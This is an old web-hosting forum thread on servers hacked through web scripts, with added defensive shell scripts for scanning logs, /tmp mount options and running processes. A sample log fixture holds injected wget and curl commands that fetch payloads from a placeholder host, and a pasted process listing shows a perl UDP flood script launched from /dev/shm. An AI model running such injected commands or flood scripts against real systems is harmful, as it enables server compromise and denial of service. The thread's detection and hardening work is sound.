The Community Forums


OpenSSL Hack Vulnerability

Discussion in 'General Discussion' started by matthewdavis, Sep 12, 2003.

  1. matthewdavis

    This is really a fairly known bug. But I do believe our servers are still affected by it, due to the fact I have 2 servers that have been hit by this bug. So any insight as to why our servers were hit by this would be greatly appreciated.

    I noticed some fishy directories in /tmp and /usr/tmp. A few names of these directories are .inoe, .xfs, .n, .a, and a directory with a bunch of spaces. And inside these directories are eggdrop bots and programs to hide processes so a normal top or ps output doesn't show anything suspicious.

    All these files are owned by 'nobody', which leads me to believe they came in through the web server. Plus on one of my servers they left behind a tool called 'scanSSL' which looks for servers with OpenSSL 0.9.6d and older. I keep my server up-to-date with RedHat errata packages and cPanel updates, and yet my server is still vulnerable.

    And I'd be happy to stand corrected about any of this. If I overlooked something, please tell me.

    But I'd suggest everyone check your /tmp, /var/tmp and /usr/tmp directories for any suspicious directories.

    SSH into your machine and 'ls -a /tmp' and 'ls -a /usr/tmp' and so on.

  2. matthewdavis

    Has anyone encountered this? Does anyone have anything suspicious in their /tmp, /usr/tmp, or /var/tmp directories?

    Do a 'ls -alR /var/tmp' or 'ls -alR /usr/tmp' or 'ls -alR /tmp', and if you see anything like eggdrops or scripts, or irc servers, then it's possible you've been hacked.

  3. Curious Too

    What evidence do you have that this was an OpenSSL exploit? I have had files dropped in the tmp directory via pMachine, GreyMatter, Gallery and a poorly coded Movable Type template.

  4. matthewdavis

    Well, because one of my servers had a few scripts, 'scanSSL' as one of them, and a script which would run nmap and find IPs running web servers. Plus one of them had the 'openssl-too-open.c' program there.

    And from the openssl-too-open.c file -
    So I can only assume it was using an SSL exploit. Currently I have a hacker I haven't cracked down on yet because he's just running a simple eggdrop with no dangerous scripts. And I'm monitoring the activity and how he restarts the eggdrop bot.

    I'll post my results when I have some.

  5. PbG

  6. techark

    90% of the time they drop these in via a bad script on a site somewhere.

    cd /usr/local/apache/domlogs and type grep wget ./*

    Lots of times you find the account they came in through.

    It is a good idea to make your tmp dir no-execute to keep them from running the scripts there.
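    As an added example (not from techark's post or from cPanel), a sharper version of "cd /usr/local/apache/domlogs; grep wget ./*": it flags requests whose query string tries to make the web server fetch something (wget, curl, fetch, lynx) and reports the client IP and the script that was abused, prefixed with the domlog name so the account can be identified. The log lines in the block are constructed sample data.

```shell
# Added example, not from the thread: scan Apache domlogs for requests that
# try to make the web server download something, the pattern techark's
# `grep wget ./*` looks for, but with the client IP and abused script pulled out.

# Constructed sample domlog in Apache common log format (fields: client ip,
# ident, user, [date], "method path protocol", status, bytes).
SAMPLE_LOG='10.0.0.5 - - [12/Sep/2003:03:14:07 -0400] "GET /index.php HTTP/1.1" 200 5123
10.0.0.9 - - [12/Sep/2003:03:15:22 -0400] "GET /gallery/view.php?cmd=cd%20/tmp;wget%20http://EXAMPLE-HOST/bot.tgz HTTP/1.1" 200 23
10.0.0.5 - - [12/Sep/2003:03:16:01 -0400] "GET /about.html HTTP/1.1" 200 2210
10.0.0.9 - - [12/Sep/2003:03:17:45 -0400] "GET /gallery/view.php?cmd=curl+-O+http://EXAMPLE-HOST/udp.pl HTTP/1.1" 200 23'

# scan_domlog [FILE ...]  (reads stdin when no file is given)
# Prints "<client-ip> <requested-script>" for every fetch-style request.
scan_domlog() {
    awk '
        # $7 is the request target; downloaders show up in its query string
        # after a separator and followed by an encoded space (%20 or +).
        $7 ~ /[?&=;](wget|curl|fetch|lynx)(%20|[+])/ {
            split($7, parts, "[?]")     # drop the query string
            print $1, parts[1]
        }' "$@"
}

# scan_domlog_dir DIR: run scan_domlog over every log in DIR and prefix
# each hit with the log name, which on cPanel is the account domain.
scan_domlog_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        scan_domlog "$f" | sed "s|^|$(basename "$f") |"
    done
}

# Number of distinct client IPs that issued such requests.
count_fetch_sources() {
    scan_domlog "$@" | awk '{ print $1 }' | sort -u | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | scan_domlog
```

    On a live box, `scan_domlog_dir /usr/local/apache/domlogs` gives the same listing per account.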

  7. GOT

    OpenSSH package is currently available via up2date if you are not willing to wait.

  8. carock

    Lock Icon wrong too...

    According to the CERT Advisory, and RedHat Errata, the version of OpenSSL I had installed on my cPanel server was vulnerable.

    Yet, there is no lock icon at the top of the WHM News on my box.

    Who's responsible for making those?

    When I ran the update System Software link, it did upgrade my OpenSSL to 0.9.6b-35.7 which is the latest patched version from RedHat.

    Chuck

    #8 carock, Oct 2, 2003
    Last edited: Oct 2, 2003
  9. PbG

    Re: Lock Icon wrong too...

    Until the release number changes, the icon will reflect 0.9.6 as secure, but as long as the updates occur I would not worry about the difference between the icon showing 0.9.6b-35.7 and merely 0.9.6/0.9.6b.

  10. gundamz

    I am currently having this problem now. What can I do to stop this hacker?
     
  11. eth00

    The first and biggest thing is to secure your /tmp and make it non-executable. A lot of stuff comes in through /tmp and is executed. If you do a search you should be able to find some good information. You also should run chkrootkit to make sure nothing else happened.
     
  12. gundamz

    What is the safest permission we should give for "tmp"?
     
  13. Website Rob

    noexec,nosuid
     
  14. laura

    How do I know whether this /tmp directory is already secure (noexec, nosuid)?
     
  15. Website Rob

    Looking at it is the first thing that comes to my mind. ;)

    If you haven't done it before, open: /etc/fstab with your favourite editor, change the 'tmp' settings, save & close the file. Then use: mount -a to have the changes kick in.
     
  16. BeerUser

    LABEL=/                 /                       ext3    defaults,usrquota        1 1
    LABEL=/boot             /boot                   ext3    defaults        1 2
    none                    /dev/pts                devpts  gid=5,mode=620  0 0
    none                    /proc                   proc    defaults        0 0
    none                    /dev/shm                tmpfs   defaults        0 0
    /dev/hda2               swap                    swap    defaults        0 0
    /dev/fd0                /mnt/floppy             auto    noauto,owner,kudzu 0 0
    is what I have when I pico the file...

    How come tmp isn't listed at all.. I did use /scripts/securetmp I think it was.
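    As an added example (not from any post in this thread), a small POSIX shell check for the noexec,nosuid setting Website Rob describes and laura asks how to verify. It reads the output of `mount` rather than /etc/fstab, so it also covers a /tmp that /scripts/securetmp mounted from a loopback file without adding an fstab line, which is why BeerUser's fstab shows no tmp entry. The `mount` lines in the block are constructed sample output.

```shell
# Added example, not from the thread: report whether /tmp (and the other
# scratch directories the thread mentions) is mounted noexec,nosuid.

# Constructed sample of `mount` output: /tmp mounted without noexec/nosuid.
SAMPLE_MOUNT_WEAK='/dev/hda1 on / type ext3 (rw,usrquota)
/dev/hda3 on /tmp type ext3 (rw)
none on /dev/shm type tmpfs (rw)'

# Same host after editing /etc/fstab and running `mount -a`.
SAMPLE_MOUNT_FIXED='/dev/hda1 on / type ext3 (rw,usrquota)
/dev/hda3 on /tmp type ext3 (rw,noexec,nosuid)
none on /dev/shm type tmpfs (rw,noexec,nosuid)'

# tmp_mount_status MOUNTPOINT [MOUNT_OUTPUT]   (defaults to live `mount`)
# Prints one of: not-a-mountpoint, missing:<opts>, secured.
# Exit status is 0 only when secured. A directory that is not its own
# mount point inherits the (executable) options of its parent filesystem.
tmp_mount_status() {
    mp=$1
    out=${2:-$(mount)}
    # `mount` lines look like: DEVICE on MOUNTPOINT type FSTYPE (OPTIONS)
    line=$(printf '%s\n' "$out" | awk -v mp="$mp" '$3 == mp { print; exit }')
    if [ -z "$line" ]; then
        echo "not-a-mountpoint"
        return 1
    fi
    opts=$(printf '%s\n' "$line" | sed 's/.*(\(.*\)).*/\1/')
    missing=""
    for want in noexec nosuid; do
        case ",$opts," in
            *,$want,*) ;;
            *) missing="$missing$want," ;;
        esac
    done
    if [ -n "$missing" ]; then
        echo "missing:${missing%,}"
        return 1
    fi
    echo "secured"
    return 0
}

# Check every world-writable scratch directory named in the thread
# (/var/tmp and /usr/tmp are often symlinks into /tmp, which then shows
# as not-a-mountpoint here; follow the link and check its target).
for d in /tmp /var/tmp /usr/tmp /dev/shm; do
    printf '%-9s %s\n' "$d" "$(tmp_mount_status "$d" "$SAMPLE_MOUNT_FIXED")"
done
```

    Drop the second argument to run it against the live `mount` output.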
     
  17. gundamz

    Does /scripts/securetmp do the same trick and secure my tmp?
     
  18. Website Rob

    If 'tmp' does not have its own partition, then I would use that script as it does somewhat secure it -- which is definitely better than not doing anything.
     
  19. gundamz

    ok..
     
  20. tvcnet

    tmp Secured but hacks continue

    Hi folks.
    For those of you who feel safe after making your /tmp directory non-executable:

    We've had it set non executable for months and one morning found the following in /tmp "running" and happily DOS'ing another host.

    nobody 1073 30041 0 16:21 ? 00:00:00 lpd
    nobody 1089 1 0 16:21 ? 00:00:00 /bin/sh
    nobody 9451 1073 0 17:04 ? 00:00:00 sh -c echo "(`whoami`@`uname -n`:`pwd`)"; /
    nobody 9457 9451 0 17:04 ? 00:00:00 /bin/sh
    nobody 9689 10678 0 17:05 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
    mysql 9961 5169 0 17:06 ? 00:00:02 /usr/sbin/mysqld --basedir --datadirvar
    mysql 10323 5169 0 17:07 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 11992 10678 0 17:15 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
    nobody 12612 9457 22 17:16 ? 00:52:06 perl /tmp/udp.pl 69.64.34.214 6000 1
    mysql 13555 5169 0 17:20 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 13558 9689 0 17:20 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
    nobody 13559 13558 21 17:20 ? 00:49:13 /usr/bin/perl udp.pl 69.64.34.214 6000 1
    mysql 14053 5169 0 17:21 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 14055 11992 0 17:21 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
    nobody 14057 14055 21 17:21 ? 00:48:34 /usr/bin/perl udp.pl 69.64.34.214 6000 1
    nobody 16595 10678 0 17:30 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
    mysql 16604 5169 0 17:30 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
    nobody 16608 16595 0 17:30 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
    nobody 16609 16608 21 17:30 ? 00:46:04 /usr/bin/perl udp.pl 69.64.34.214 6000 1


    Note this command that somehow gets past the non-executable setting:
    sh -c cd /dev/shm;/usr/bin/perl udp.pl

    I can assure you that no one has SSH access on our server other than a few trusted clients.

    What do you all make of this?

    Thanks,
    Jim
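    As an added example (not from Jim's post or from cPanel), a process check for exactly what the listing above shows. noexec stops the kernel from executing a file that lives on /tmp, but `perl /tmp/udp.pl` executes /usr/bin/perl, which merely reads the script, so it runs regardless; the same goes for `sh -c cd /dev/shm; ...`. The block scans `ps -ef` style output for interpreters fed a script from a scratch directory or shells that cd into one; the sample lines are constructed, modelled on the listing, with the target IP replaced by a documentation address.

```shell
# Added example, not from the thread: flag processes that sidestep a noexec
# /tmp by running an interpreter on a script stored there (or in /dev/shm).

# Constructed sample in `ps -ef` layout: user, pid, ppid, c, stime, tty, time, cmd.
SAMPLE_PS='nobody 1073 30041 0 16:21 ? 00:00:00 lpd
nobody 9689 10678 0 17:05 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
mysql 9961 5169 0 17:06 ? 00:00:02 /usr/sbin/mysqld --basedir --datadirvar
nobody 12612 9457 22 17:16 ? 00:52:06 perl /tmp/udp.pl 192.0.2.10 6000 1
nobody 13558 9689 0 17:20 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 192.0.2.10
root 20 1 0 16:00 ? 00:00:00 perl /usr/local/cpanel/bin/somedaemon'

# World-writable directories that a noexec mount is meant to neutralise.
SCRATCH_DIRS='/tmp /var/tmp /usr/tmp /dev/shm'

# suspicious_procs [PS_OUTPUT]   (defaults to live `ps -ef`)
# Prints "user pid reason cmd" for each flagged process.
suspicious_procs() {
    out=${1:-$(ps -ef)}
    printf '%s\n' "$out" | awk -v dirs="$SCRATCH_DIRS" '
        BEGIN { n = split(dirs, d, " ") }
        NR == 1 && $1 == "UID" { next }          # header line from a live ps
        {
            cmd = ""
            for (i = 8; i <= NF; i++) cmd = cmd (i > 8 ? " " : "") $i
            reason = ""
            for (j = 1; j <= n; j++) {
                # an interpreter handed a script that lives under a scratch dir
                if (cmd ~ ("^([^ ]*/)?(perl|python|php|sh|bash)[0-9.]* +" d[j] "/"))
                    reason = "interp-in-" d[j]
                # a shell that changes into a scratch dir before running something
                if (cmd ~ ("cd +" d[j] "[ ;]"))
                    reason = "cd-into-" d[j]
            }
            if (reason != "") print $1, $2, reason, cmd
        }'
}

suspicious_procs "$SAMPLE_PS"
```

    The fake `lpd` under nobody in the original listing is not caught by this rule; it needs a comparison of each nobody process against its httpd parent, which is a separate check.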
     